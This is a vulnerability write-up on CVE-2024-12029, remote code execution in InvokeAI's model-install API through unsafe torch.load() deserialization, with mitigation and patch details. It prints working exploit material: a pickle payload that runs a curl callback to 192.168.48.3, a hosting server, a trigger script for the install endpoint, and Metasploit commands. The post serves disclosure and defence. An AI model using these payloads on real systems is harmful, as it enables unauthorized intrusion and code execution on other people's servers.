

Research & Tutorials

Jul 17, 2025

CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data vulnerability

CVE-2024-12029: a critical deserialization vulnerability in InvokeAI’s /api/v2/models/install endpoint allows remote code execution via malicious model files, putting exposed AI art servers at risk.

OffSec Team


Overview

CVE-2024-12029 is a Deserialization of Untrusted Data vulnerability in the /api/v2/models/install API endpoint of InvokeAI, a popular AI art generation tool. By sending specially crafted model files, attackers can exploit this flaw to achieve remote code execution on the server.


  • CVE ID: CVE-2024-12029
  • Severity: Critical
  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • EPSS Score: 61.17%
  • Published: February 7, 2025
  • Impact: Remote Code Execution
  • Attack Vector: Remote
  • Authentication Required: No
  • Vulnerable Component: Model installation API using unsafe torch.load() deserialization

This vulnerability affects any InvokeAI installation that exposes the model installation API to untrusted users or networks.

Technical Breakdown

The /api/v2/models/install API endpoint accepts user-specified model URLs for downloading and loading AI models. InvokeAI uses PyTorch’s torch.load() function to deserialize model files without proper validation or sandboxing.

PyTorch’s torch.load() function can execute arbitrary Python code embedded within serialized model files. By crafting a malicious model file with embedded Python code, an attacker can achieve remote code execution when the model is loaded server-side.
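To see the underlying mechanism in isolation, consider the minimal sketch below, which uses only the standard library (the Demo class and its message are purely illustrative). pickle, which torch.load() builds on for non-safetensors files, invokes an object’s __reduce__ hook during deserialization, so merely loading a file runs attacker-chosen callables.

import pickle


class Demo:
    def __reduce__(self):
        # pickle calls the returned callable with the given arguments while
        # deserializing; an attacker can substitute os.system or similar
        return (print, ("code executed during unpickling",))


blob = pickle.dumps(Demo())
pickle.loads(blob)  # prints the message: deserialization alone ran code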


Conditions for Exploitation

  • The InvokeAI instance is running a vulnerable version (5.3.1 through 5.4.2).
  • The /api/v2/models/install endpoint is accessible to the attacker (a quick reachability check is sketched after this list).
  • The attacker can host a malicious model file on a web server or provide a URL to it.
  • Model validation and sandboxing are not properly implemented.
  • The InvokeAI process has sufficient privileges to execute the embedded malicious code.
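The first two conditions can be checked remotely before attempting exploitation. The sketch below is an assumption-laden probe, not part of the original advisory: it assumes the default InvokeAI port 9090 and that the target, like stock InvokeAI, serves its version string at /api/v1/app/version; verify both against your target.

import requests

TARGET = "http://localhost:9090"

# The version endpoint (assumed path) shows whether the build falls in the
# vulnerable 5.3.1 - 5.4.2 range.
resp = requests.get(f"{TARGET}/api/v1/app/version", timeout=5)
print("version:", resp.status_code, resp.text)

# A GET against the POST-only install route typically returns 405 (Method
# Not Allowed) when the route exists and 404 when it does not.
probe = requests.get(f"{TARGET}/api/v2/models/install", timeout=5)
print("install route present:", probe.status_code != 404)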

Vulnerable Code Snippet

The vulnerability stems from the unsafe use of PyTorch’s torch.load() in the read_checkpoint_meta() function, located in invokeai/backend/model_manager/util/model_util.py.

https://github.com/invoke-ai/InvokeAI/blob/3f880496f7d1494afb5d4136887cd06e61790d71/invokeai/backend/model_manager/util/model_util.py#L47-L65

def read_checkpoint_meta(path: Union[str, Path], scan: bool = False) -> Dict[str, torch.Tensor]:
    if str(path).endswith(".safetensors"):
        try:
            path_str = path.as_posix() if isinstance(path, Path) else path
            checkpoint = _fast_safetensors_reader(path_str)
        except Exception:
            # TODO: create issue for support "meta"?
            checkpoint = safetensors.torch.load_file(path, device="cpu")
    else:
        if scan:
            scan_result = scan_file_path(path)
            if scan_result.infected_files != 0:
                raise Exception(f'The model file "{path}" is potentially infected by malware. Aborting import.')
        if str(path).endswith(".gguf"):
            # The GGUF reader used here uses numpy memmap, so these tensors are not loaded into memory during this function
            checkpoint = gguf_sd_loader(Path(path), compute_dtype=torch.float32)
        else:
            checkpoint = torch.load(path, map_location=torch.device("meta"))
    return checkpoint
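Two details of this snippet stand out. First, the scan parameter defaults to False, so the malware scan is skipped unless a caller explicitly opts in. Second, map_location=torch.device("meta") provides no protection against this attack: device mapping only controls where tensor storage is materialized, while the pickle opcodes embedded in the file, including an attacker-supplied __reduce__ call, still execute during loading.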

Exploitation Steps

  1. Create a malicious PyTorch model file with embedded Python code:
import os
import pickle


class Payload:
    def __reduce__(self):
        # pickle invokes the returned callable with these arguments during
        # deserialization, so torch.load() runs the command server-side
        return (os.system, ('curl 192.168.48.3/rce_poc',))


def generate_payload():
    # Use a .ckpt extension (not .pkl) so InvokeAI routes the file to
    # torch.load() rather than the safetensors loader
    with open('payload.ckpt', 'wb') as f:
        pickle.dump(Payload(), f)


generate_payload()

  2. Host the malicious model file on a web server accessible to the target; a minimal hosting sketch follows.
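Any reachable web server works for this step. As a minimal sketch, Python’s built-in http.server module can serve the file, assuming payload.ckpt sits in the current working directory and the port matches the source URL used in the next step:

import http.server
import socketserver

# Serve the current directory (containing payload.ckpt) over HTTP. Binding
# port 80 requires elevated privileges; any port works as long as the
# "source" URL in the install request matches it.
PORT = 80

with socketserver.TCPServer(("0.0.0.0", PORT), http.server.SimpleHTTPRequestHandler) as httpd:
    httpd.serve_forever()

When the payload later fires on the target, the curl callback (a GET request for /rce_poc) appears in this server’s log, which doubles as confirmation of code execution.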

  3. Run the Python script below, which triggers the InvokeAI model installation API with the malicious model as its source:

import requests


def request_model_download():
    # Point the install endpoint at the attacker-hosted checkpoint; the
    # file is downloaded and then deserialized server-side
    url = "http://localhost:9090/api/v2/models/install"
    params = {
        "source": "http://192.168.48.3/payload.ckpt",
        "inplace": "true",
    }
    response = requests.post(url, params=params, json={})
    print(response.status_code, response.text)


request_model_download()

  4. The malicious code executes when InvokeAI attempts to load the model using torch.load().

Exploitation with Metasploit

Metasploit includes a module for this CVE that can be used for exploitation:

# In Metasploit console
use exploit/linux/http/invokeai_rce_cve_2024_12029
set RHOSTS target_ip
set RPORT 9090
set LHOST attacker_ip
set LPORT 4444
exploit

Mitigation

  • Update InvokeAI to version 5.4.3 or later where unsafe deserialization is fixed.
  • Use safe model loading practices with torch.load():
    • Use torch.load() with the weights_only=True parameter (see the sketch after this list)
    • Implement proper input validation and sandboxing
    • Use allowlists for trusted model sources
  • Network Segmentation: Restrict access to the /api/v2/models/install endpoint.
  • Input Validation: Validate model file signatures and contents before loading.
  • Principle of Least Privilege: Run InvokeAI with minimal necessary permissions.
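As a minimal sketch of the weights_only approach referenced in the list above (assuming PyTorch 1.13 or later, where torch.load() accepts this parameter):

import torch


def load_checkpoint_safely(path: str):
    # With weights_only=True, a restricted unpickler permits only tensors and
    # primitive containers; a __reduce__-based payload raises an
    # UnpicklingError instead of executing
    return torch.load(path, map_location="cpu", weights_only=True)

This is defense in depth rather than a substitute for upgrading; the access controls and source allowlists above still apply.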

Patch

InvokeAI resolved this issue by changing the default value of the scan parameter taken by the vulnerable function to True, so model files are scanned for malware before deserialization.

def read_checkpoint_meta(path: Union[str, Path], scan: bool = True) -> Dict[str, torch.Tensor]:
    if str(path).endswith(".safetensors"):
        try:
            path_str = path.as_posix() if isinstance(path, Path) else path
            checkpoint = _fast_safetensors_reader(path_str)
        except Exception:
            # TODO: create issue for support "meta"?
            checkpoint = safetensors.torch.load_file(path, device="cpu")
    elif str(path).endswith(".gguf"):
        # The GGUF reader used here uses numpy memmap, so these tensors are not loaded into memory during this function
        checkpoint = gguf_sd_loader(Path(path), compute_dtype=torch.float32)
    else:
        if scan:
            scan_result = pscan.scan_file_path(path)
            if scan_result.infected_files != 0:
                raise Exception(f"The model at {path} is potentially infected by malware. Aborting import.")
            if scan_result.scan_err:
                raise Exception(f"Error scanning model at {path} for malware. Aborting import.")


        checkpoint = torch.load(path, map_location=torch.device("meta"))
    return checkpoint
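Note that beyond flipping the default, the patched code also aborts when the scanner itself reports an error (scan_err), closing the gap where a failed scan could otherwise have allowed the load to proceed.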

The patch for this vulnerability can be found in the corresponding commit.

